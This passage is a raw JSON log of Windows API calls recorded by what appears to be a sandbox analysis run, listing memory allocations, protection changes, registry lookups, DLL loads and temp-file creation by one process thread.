"caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x04a95000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 273 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x04a96000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 274 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x04a97000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 275 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x04a99000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 276 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000250" }, { "name": "DesiredAccess", "value": "0x00000009", "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\Session Manager" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager" } ], "repeated": 0, "id": 277 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000250" }, { "name": "ValueName", "value": "ResourcePolicies" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies" } ], "repeated": 0, "id": 278 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000250" } ], "repeated": 0, "id": 279 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02390000" }, { "name": "RegionSize", "value": "0x00008000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 280 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02390000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 281 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x04a9b000" }, { "name": "RegionSize", "value": "0x00004000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 282 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x04960000" }, { "name": "RegionSize", "value": "0x00100000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 283 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x04960000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 284 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x04962000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 285 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02250000" }, { "name": "NumberOfBytesProtected", "value": "0x00006000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000020", "pretty_value": "PAGE_EXECUTE_READ" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 286 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02250000" }, { "name": "RegionSize", "value": "0x00007000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 287 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02250000" }, { "name": "RegionSize", "value": "0x00008000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 288 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02250000" }, { "name": "RegionSize", "value": "0x00009000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 289 }, { "timestamp": "2025-02-27 23:34:13,987", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02250000" }, { "name": "RegionSize", "value": "0x0000a000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 290 }, { "timestamp": "2025-02-27 23:34:14,566", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02250000" }, { "name": "NumberOfBytesProtected", "value": "0x0000a000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000020", "pretty_value": "PAGE_EXECUTE_READ" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 291 }, { "timestamp": "2025-02-27 23:34:14,566", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x04965000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 292 }, { "timestamp": "2025-02-27 23:34:14,566", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 293 }, { "timestamp": "2025-02-27 23:34:14,566", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x02000000", "pretty_value": "MAXIMUM_ALLOWED" }, { "name": "ObjectAttributesHandle", "value": "0x00000124" }, { "name": "ObjectAttributesName", "value": "SOFTWARE\\Microsoft\\VBA\\Monitors" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\VBA\\Monitors" } ], "repeated": 0, "id": 294 }, { "timestamp": "2025-02-27 23:34:14,691", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "NtQueryLicenseValue", "status": true, "return": "0x00000000", "arguments": [ { "name": "Name", "value": "TerminalServices-RemoteConnectionManager-AllowAppServerMode" }, { "name": "Type", "value": "0x00000004" } ], "repeated": 0, "id": 295 }, { "timestamp": "2025-02-27 23:34:14,691", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "misc", "api": "GetKeyboardLayout", "status": true, "return": "0x040a0c0a", "arguments": [ { "name": "KeyboardLayout", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 0, "id": 296 }, { "timestamp": "2025-02-27 23:34:15,019", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0072c000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 297 }, { "timestamp": "2025-02-27 23:34:15,097", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 298 }, { "timestamp": "2025-02-27 23:34:15,097", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 299 }, { "timestamp": "2025-02-27 23:34:15,159", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0072d000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 300 }, { "timestamp": "2025-02-27 23:34:15,159", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000260" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "coml2.dll" } ], "repeated": 0, "id": 301 }, { "timestamp": "2025-02-27 23:34:15,191", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000260" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x76220000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x0005e000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 302 }, { "timestamp": "2025-02-27 23:34:15,347", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x76279000" }, { "name": "ModuleName", "value": "coml2.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 303 }, { "timestamp": "2025-02-27 23:34:15,347", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 304 }, { "timestamp": "2025-02-27 23:34:15,347", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 305 }, { "timestamp": "2025-02-27 23:34:15,409", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x76276000" }, { "name": "ModuleName", "value": "coml2.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 306 }, { "timestamp": "2025-02-27 23:34:15,409", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000260" } ], "repeated": 0, "id": 307 }, { "timestamp": "2025-02-27 23:34:15,409", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x76276000" }, { "name": "ModuleName", "value": "coml2.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 308 }, { "timestamp": "2025-02-27 23:34:15,409", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "DDRAW.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 1, "id": 309 }, { "timestamp": "2025-02-27 23:34:15,409", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "D3D8.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 0, "id": 310 }, { "timestamp": "2025-02-27 23:34:15,409", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "D3D9.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 1, "id": 311 }, { "timestamp": "2025-02-27 23:34:15,409", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "misc", "api": "RtlDosPathNameToNtPathName_U", "status": true, "return": "0x00000001", "arguments": [ { "name": "DosFileName", "value": "C:\\Windows\\System32\\coml2.dll" } ], "repeated": 0, "id": 312 }, { "timestamp": "2025-02-27 23:34:15,409", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000260" }, { "name": "DesiredAccess", "value": "0x00020000", "pretty_value": "READ_CONTROL" }, { "name": "FileName", "value": "C:\\Windows\\System32\\coml2.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 313 }, { "timestamp": "2025-02-27 23:34:15,409", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000260" } ], "repeated": 0, "id": 314 }, { "timestamp": "2025-02-27 23:34:15,409", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\coml2" }, { "name": "DllBase", "value": "0x76220000" } ], "repeated": 0, "id": 315 }, { "timestamp": "2025-02-27 23:34:15,691", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 316 }, { "timestamp": "2025-02-27 23:34:15,691", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000124" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\OLE\\Tracing" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\OLE\\Tracing" } ], "repeated": 0, "id": 317 }, { "timestamp": "2025-02-27 23:34:15,691", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\coml2" }, { "name": "BaseAddress", "value": "0x76220000" }, { "name": "InitRoutine", "value": "0x7624fea0" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 318 }, { "timestamp": "2025-02-27 23:34:15,691", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75392000" }, { "name": "ModuleName", "value": "ole32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 319 }, { "timestamp": "2025-02-27 23:34:15,691", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75392000" }, { "name": "ModuleName", "value": "ole32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 320 }, { "timestamp": "2025-02-27 23:34:15,691", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\xb4\\xf6\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\x00\\xcd$v\\xac'8u0\\xcd$v\\xe8\\xecr\\x00\\x04\\x00\\x00\\x00\\xe8\\xf6\\x19\\x00\\x90k\"v\\xd0\\xdf%v`.&v@\\xdf%v" } ], "repeated": 0, "id": 321 }, { "timestamp": "2025-02-27 23:34:15,691", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000026c" }, { "name": "DesiredAccess", "value": "0x000f0007", "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_WRITE" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x00000000" } ], "repeated": 0, "id": 322 }, { "timestamp": "2025-02-27 23:34:15,691", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000026c" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x051f0000" }, { "name": "SectionOffset", "value": "0x0019f5fc" }, { "name": "ViewSize", "value": "0x00400000" }, { "name": "Win32Protect", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 323 }, { "timestamp": "2025-02-27 23:34:15,691", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x051f0000" }, { "name": "RegionSize", "value": "0x00004000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 324 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000270" }, { "name": "DesiredAccess", "value": "0xc0100080", "pretty_value": "GENERIC_READ|GENERIC_WRITE|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\~DF888F0BBEA54E1504.TMP" }, { "name": "CreateDisposition", "value": "2", "pretty_value": "FILE_CREATE" }, { "name": "ShareAccess", "value": "1", "pretty_value": "FILE_SHARE_READ" }, { "name": "FileAttributes", "value": "0x00000080", "pretty_value": "FILE_ATTRIBUTE_NORMAL" }, { "name": "ExistedBefore", "value": "no" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 325 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "filesystem", "api": "NtQueryInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000270" }, { "name": "HandleName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\~DF888F0BBEA54E1504.TMP" }, { "name": "FileInformationClass", "value": "5", "pretty_value": "FileStandardInformation" }, { "name": "FileInformation", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 326 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000270" }, { "name": "HandleName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\~DF888F0BBEA54E1504.TMP" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 1, "id": 327 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "filesystem", "api": "NtSetInformationFile", "status": true, 